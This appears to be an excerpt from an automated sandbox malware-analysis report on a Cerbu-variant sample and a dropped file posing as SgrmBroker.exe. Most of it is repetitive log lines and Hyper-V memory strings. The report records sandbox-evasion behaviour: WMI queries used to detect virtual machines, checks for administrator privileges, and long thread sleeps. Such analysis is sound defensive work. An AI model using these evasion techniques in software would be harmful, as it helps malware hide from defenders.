Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9901Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_24-17802
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272Thread sleep count: 9901 > 30Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1655713768.00000245B0E99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gment offers made9606Retrieval: Average branch rate9608Discovery: Successful discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes?
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor0&
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus PipesL
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1665045921.00000245B110B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Swi
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine BusA
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V HypervisorD0nf
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653708046.00000245AF59A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table All
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionr
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorn
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1657405472.00000245AF5A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1656667178.00000245AF5A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976H
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorrD
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionl5
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor0Y9
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionem)
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes_@z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical ProcessorllKAw
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid PartitionY
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processorexe
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1664616460.00000245B0E61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.syse
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
